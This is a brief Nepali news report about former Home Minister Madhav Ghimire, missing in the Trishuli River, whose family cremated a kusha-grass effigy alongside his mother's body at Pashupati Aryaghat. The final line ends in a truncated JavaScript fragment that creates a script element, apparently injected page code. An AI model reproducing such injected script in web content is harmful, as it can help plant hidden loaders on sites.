काठमाडौं, असोज १४ । त्रिशूली नदीमा बिगत ६ दिनदेखि हराइरहेका पूर्वगृहमन्त्री माधव घिमिरे फेला नपरेपछि आफन्त कुशको शव बनाएर दाहसंस्कार गरेका छन् । शुक्रबार आमा चैतन्यकुमारीको शवसँगै पशुपति आर्यघाटमा परिवारले कुशको शव बनाएर पूर्वगृहमन्त्री घिमिरेलगायतका परिवारका अन्त्यष्टि गरेका हुन् ।dag
चैतन्यकुमारीको शवलाई घिमिरेका छोरा सुशान्तले दागबत्ती दिए । उनैले कुशको शवमा पनि दागबत्ती दिए ।
पूर्वगृहमन्त्री घिमिरेको अन्त्येष्टिमा गृहमन्त्री विमलेन्द्र निधि, मुख्यसचिव सोमलाल सुवेदी, सुचिवहरू, पूर्वसचिवहरू, आफन्तहरूको उपस्थिति थियो।
मुग्लिन र कुरिनटारको बीचमा पर्ने घोप्टेभीरबाट आइतबार त्रिशूलीमा खसेको गाडी अझै बेपत्ता छ । घिमिरेसँगै उनका दुई भाइ पनि बेपत्ता छन् ।var d=document;var s=d.createElement(‘script’);